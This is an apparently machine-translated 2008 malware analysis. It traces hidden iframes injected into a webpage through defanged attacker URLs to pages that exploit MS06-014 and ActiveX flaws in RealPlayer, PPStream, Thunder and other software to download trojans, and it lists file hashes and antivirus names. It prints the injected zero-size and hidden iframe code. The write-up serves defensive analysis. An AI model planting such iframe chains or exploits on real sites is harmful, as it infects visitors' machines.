A Power Information Network Trojan worm. win32.autorun, Trojan-Downloader.Win32.Losabel

Source: Internet
Author: User
Tags crc32

A Power Information Network Trojan worm. win32.autorun, Trojan-Downloader.Win32.Losabel

EndurerOriginal
2008-05-28 th1Version

Webpage code:
/---
<IFRAME src = hxxp: // C ** 5.*5 * I *** 6.us/ c5.htm? 8888 width = 0 H'>
<IFRAME src = "hxxp: // 125.*64.*92. * 56/iisstart.htm" width = "100" Height = "0"> </iframe>
---/

#1 hxxp: // C ** 5.*5 * I *** 6.us/ c5.htm? 8888 content:
/---
<IFRAME src = hxxp: // www. * 36 ** 0C * 36*0. ***. CN/100.htm width = 0 Height = 0> </iframe>
---/

#1.1 hxxp: // www. * 36 ** 0C * 36*0. ***. CN/100.htm contains the Code:
/---
<IFRAME Style = display: None src = "hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/u.html "> </iframe>
---/

#1.1.1 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/u.html output code:
/---
<SCRIPT src00001.gif> </SCRIPT>
<IFRAME width = 100 Height = 0 src00006.gif> </iframe>
<IFRAME width = 100 Height = 0 src00005.gif> </iframe>
<IFRAME width = 100 Height = 0 src1_3.gif> </iframe>
<IFRAME width = 100 Height = 0 src1_2.gif> </iframe>
<IFRAME width = 100 Height = 0 src00007.gif> </iframe>
<IFRAME width = 100 Height = 0 src00004.gif> </iframe>
---/

#1.1.1.1 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/1.gif

Download hxxp: // www. * 36 ** 0a * 36*0. *. CN/D/614.exe with MS06-014 Vulnerability

File Description: D:/test/614.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 18:14:48
Modified on: 18:14:49
Access time: 18:15:15
Size: 15180 bytes, 14.844 KB
MD5: f30fd225bfae1c1ef6a349d8fd078a06
Sha1: 09b2f964291b216de0fe69416c43eff00a94b1d9
CRC32: 50053f7c

Kaspersky reports worm. win32.autorun. DNV

#1.1.1.2 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/2.gif

Download hxxp: // www. * 36 ** 0a * 36*0. **. CN/D/r11.exe by using the RealPlayer (ierpctl. ierpctl.1) Vulnerability
R11.exe and 614.exe

#1.1.1.3 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/3.gif

Use the storm video (MPs. stormplayer.1) vulnerability to download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/bf.exe,
Bf.exe and 614.exe

#1.1.1.4 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/4.gif

Download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/pps.exe with the PPStream (powerplayer. powerplayerctrl.1, CLSID: Taobao) Vulnerability
Pps.exe and 614.exe

#1.1.1.5 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/5.gif

Download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/lz.exe using the vulnerability glchat. glchatctrl.1, CLSID: 61f5c358-60fb-4a23-a312-d2b556620f20.
Lz.exe and 614.exe

#1.1.1.6 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/6.gif

Use the thunder (dpclient. VOD, CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) vulnerability to download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/xl.exe
Xl.exe and 614.exe

#1.1.1.7 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/7.gif

Download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/r11.exe by using the RealPlayer (ierpctl. ierpctl.1, CLSID: alias) Vulnerability
R11.exe and 614.exe

#1.1.1.8 use baidubar. tool to download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/Ad. Cab, which contains ad.exe and 614.exe

#2 hxxp: // 125.*64.*92. * 56/iisstart.htm contains the Code:
/---
<IFRAME src = "hxxp: // D ***. So *** R *** ryl *. Biz/XX/am1.htm? 12-8888 "width =" 100 "Height =" 0 "> </iframe>
---/

#2.1 hxxp: // D ***. So *** R *** ryl *. Biz/XX/am1.htm? 12-8888 include/output code:
/---
<IFRAME src = "hxxp: // D ***. So *** R *** ryl *. Biz/ax14.htm" width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // D ***. So *** R *** ryl *. Biz/re10.htm" width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // www. To ** ngji ** 12 ** 3.org/axfs.htm" width = 100 Height = 0> </iframe>
<IFRAME Style = display: None src = "hxxp: // D ***. So *** R *** ryl *. Biz/axlz.htm"> </iframe>
<IFRAME Style = display: None src = "hxxp: // D ***. So *** R *** ryl *. Biz/re11.htm"> </iframe>
---/

#2.1.1 hxxp: // D ***. So *** R *** ryl *. Biz/ax14.htm

Download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe with MS06-014 Vulnerability

File Description: D:/test/soc.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 18:14:50
Modified on: 18:14:53
Access time: 18:15:15
Size: 22336 bytes, 21.832 KB
MD5: d06728a40f94710ad45415cc43f58d0d
Sha1: 3366fb9041b8186bf0381711b1bc3aaeabfd609a
CRC32: e7d1a119

Kaspersky report:Trojan-Downloader.Win32.Losabel.nx

#2.1.2 hxxp: // D ***. So *** R *** ryl *. Biz/re10.htm

Use the RealPlayer vulnerability to download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe

#2.1.3 hxxp: // www. To ** ngji ** 12 ** 3.org/axfs.htm
/---
File does not exist
---/

#2.1.4 hxxp: // D ***. So *** R *** ryl *. Biz/axlz.htm

Download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe by exploiting the world gliedown. iedown.1, CLSID: F917534D-535B-416B-8E8F-0C04756C31A8 Vulnerability

#2.1.5 hxxp: // D ***. So *** R *** ryl *. Biz/re11.htm

Download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe using the RealPlayer (ierpctl. ierpctl.1, CLSID: 2f542a2e-edc9-4bf7-8cb1-87c9919f7f93) Vulnerability

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.